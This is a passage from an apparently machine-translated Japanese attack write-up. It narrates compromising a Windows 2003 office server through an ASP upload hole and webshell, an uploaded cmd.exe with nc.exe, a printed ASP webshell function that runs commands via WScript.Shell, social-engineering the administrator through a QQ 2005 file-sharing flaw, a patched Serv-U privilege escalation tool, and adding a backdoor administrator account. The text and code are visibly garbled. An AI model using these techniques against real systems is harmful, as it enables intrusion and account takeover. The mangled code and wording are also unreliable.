QQファイル共有の穴でWindows 2003の堅牢な砦を徹底的に攻略します。


サーバー上で実行されているサードパーティのソフトウェアは、攻撃者たちがターゲットシステムに侵入する近道と見なされています。今、有名な騰訊QQはまたこれらの近道リストに入れられました。幸い、QQはサーバで必要なソフトウェアの一つではないので、広範囲の危機を招くことはないと信じています。文の中で特殊な情況に出会うのは多くないが、しかしみんなはやはり“可能なのは予防するべきです”の原則に従って相応して防御を行うべきです。
一、Windows 2003で得たwebshell
今回の浸透の目標はOAオフィスシステムサーバーです。そのオペレーティングシステムは最近Windows 2003にアップグレードしましたが、OAはまだaspファイルのアップロードホールがありますので、webshellの取得には何の懸念もありません。
障害は権限アップ時に発生する------。
webshellにログインしたら、サーバーのDディスクしか確認できませんでした。Cディスクにはアクセスできません。webshellのヒントは「権限がありません」です。これは予想されていなかったことです。ウェnshellはgustsグループの権限しかないため、win 2003のデフォルトでは「Everyone」「匿名ユーザーおよびGusest」グループの権限を持つユーザーがcmd.exeにアクセスできなくなりました。webshellを通じてcmd.exeを実行できなくなりました。
唯一の喜びはWebshellを利用することです。 Dディスク(ウェブ仮想ディレクトリが格納されている)の各サブディレクトリを読み書きすることができます。ここでは、ウェブ上の仮想ディレクトリ以外にも、いくつかのデータのバックアップファイルとディレクトリTencentをインストールします。
二、Serv-uを解読する究極の予防
Windows 2003の様々なデフォルトのセキュリティ設定は、その強力な側面を示しています。近い段階で既存の権限を高めることは不可能になりそうです。システムからこのサーバーにFTPリンクを要求し、Serv-uのbannerを見た時に、やっと希望が持てるようになりました。
Windows 2003のcmd.exeに対する権限制限により、webshell方式でcmd.exeを実行できないという論断は、2004年6期の防衛線の「Windows 2003バリアホストを構築する」という文でも言及しましたが、実際にはそれが正しくないことが分かりました。webshellを通じて、ローカル非2003システムに制限されていないcmd.exeファイルをアップロードしました。Windows 2003においても、webshell方式により相応の権限を持つcmd.exeが得られる。nc.exeを結合して、さらにgustグループの権限を持つコマンドラインのshellを得ることができます。
このために、私は老兵の駅長助手6.0に対していくつかの改善を行いました。Wscript.shellコンポーネントを利用してローカルアップロードのcmd.exeを実行することができます。
Function CmdShell()
If。 Request(「SP」)<>「」 The n Session(「ShellPath」) = Request(「SP」)
ShellPath=Session(「ShellPath」)
if ShellPath=" The n ShellPath = "cmd.exe"
if Request(「wscript」)=「yes」 then
checked=" checked"
else
checked="
end if
If。 Request("cmd")<>"" The n DefCmd = Request(「cmd」)
SI=""
SI=SI&""
If。 Request.Form("cmd")<>" The n
if Request.Form(「wscript」)=「yes」 then
セット CM=CreateObject(ObT(1,0)
セット DD=CM.exec(ShellPath&" /c "&DefCmd)
aa=DD.stdout.readall
SI=SI&aa
else%>



<%szTempFile = server.mappath(「cmd.txt」)
コール ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile 0, True
セット fs = CreateObject(「Script.FileSystemObject」)
セット o Filelcx = fs.OpenText File (szTempFile 1, False 0)
aa=Server.HTMLEncode(oFilelcx.ReadAll)
o Filelcx.Close
コール fso.DeleteFile(szTempFile) True
SI=SI&aa
end if
End If。
SI=SI&chr(13)&「SI=SI&「SHELLパス:  "
SI=SI&"WScript.Shell
Resonse.Write SI
End Function
利用する時はshellのパスの中でアップロードのcmd.exeパスを指定するだけで、Wscriptを選択すると必要な権限の低いシステムコマンドを実行できます。 startまたはnetstat -an」は、この2つのコマンドを順次実行した後、Webshellは、Serv-Uを含む多くのサービスを回復しました。 FTP Server, イベントポートのリストに43958ポートが表示されました。そして、私は自然に神通広大なServ-uを思い出しました。 ftp Serverローカル権限は、脆弱性を高める。本当に使用されているftpローカル権限アップツールは、システムコマンドを実行する時に530エラーメッセージが表示されます。管理人や他の人がServ-uにプリンを作ったり、安全な配置をしたりしたようです。どのような安全配置なのかを知るために、インターネットで関連記事を調べました。 ftp Server 地元の権限が脆弱性を高める究極の防犯」が人気で、多方面にわたって転載されています。作者は世外高人xiaoluです。エラーメッセージから見ると、この文の最終的な予防とは、ServUDaemen.exeのデフォルトの管理者またはパスワードを変更した可能性が高いです。もちろんこれは仮定にすぎません。ターゲットサーバ上のServUDaemen.exeをダウンロードして具体的な構成を見てこそ確認できますが、Serv-uがインストールされているC盤はProgrameを含めてアクセス禁止です。 files ディレクトリ、権限がアップグレードされ、再度妨げられます。
三、QQ 2005共有ファイルの脆弱性を利用して権限を最後まで高める
再度Dドライブをめくりました。サーバーで見ることができないTencentフォルダをまた見ました。whatsnew.txtを表示します。
QQのバージョンを知るのはQQ 2005です。 Beta 1は、いくつかの関連ファイルの作成時間も、最近サーバー上でQQにログインしたことがあると説明しています。QQしか使えないですか?考えた結果、ようやく利用できるQQ 2005のファイル共有機能における一つの脆弱性を思い出しました。
この脆弱性はQQ 2005年の賀歳版の新機能とともに現れた。この脆弱性を利用して攻撃者が閲覧でき、ユーザシステム内の任意のファイル(例えば、samファイル、データバックアップファイル、敏感情報ファイル)を読み込むことができると説明しても良い。影響システム:QQ 2005賀歳版以上のすべてのWindowsシリーズのOSがインストールされています。
具体的な利用方法は、まず本機で自分のQQに登録し、「QQメニュー」を呼び出し、共有を設定し、C:\または他の利用価値のあるパーティションを共有ファイルとして指定し、完成したらQQを閉じて、インストールディレクトリ下のQQアカウントで命名されたフォルダ内の「ShareInfo.db」ファイルを見つけます。図3に示すように、アップロード対象サーバ上の同じファイル(例えば、D:\Tencent\QQ\654321\ShareInfo.db)。このように、ネットワーク管理がサーバ上でQQに登録すると、友達にCディスクを共有ディレクトリとして開放します。
見知らぬ人は相手のファイルを共有できないので、社会工学で管理人を友達として登録する必要があります。管理者が要求を通じて、サーバーのC盤はQQ共有ファイルディレクトリとして共有されます。もともとはWEBSHELLを通じてアクセスできなかったServUDaemone.exeファイルがダウンロードされます。障害に遭遇した権限アップグレードの道はまた続けられます。
その夜に管理人が申請を通過して、私を友達に追加しました。サンゴ虫QQに表示されているIPはターゲットサーバのIPです。ServUDaemen.exeファイルをダウンロードしました。UEで開けて127..0.1を探してみたら、デフォルト設定の内蔵アカウント「Local Administrator」はやはり「Local Administruser」に変更されました。これは「究極」の防御に見えますが、この方法を提示したxiaoluは攻防に必要な位置転換の考えがないように公表します。攻撃者は修正後の配置を知るだけで、地元の権限を高めるためのツールを修正します。いわゆる究極の防御も突破されます。方法はやはりUEで脱皮したserv-uローカル権限を開いて利用ツールを向上させ、Local AdministruserをLocal Administruserに変更すればいいです。
その後、修正されたft.2 exeをアップロードして、wscript.shellでD:\web\ft 2.exeを実行します。 “ネット user user password /add”の後で結果を見てみて、すでにユーザーを追加しました。そのユーザーをadministratorsグループとRemoteに追加します。 desktop usersグループはターゲットサーバのリモートデスクトップに登録しました。
DDDはいろいろな危険を経て、ついにこの堅固なWindows 2003砦を徹底的に攻略しました。
四、簡単な啓発
「サービスが少ないほど安全」と同じように、サーバー上の「サードパーティ」が少ないほど安全で、人気のPcAnywhere、VNC、Serv-U 権限アップとここに提出されたQQ 2005の利用権限アップは、このように避けられます。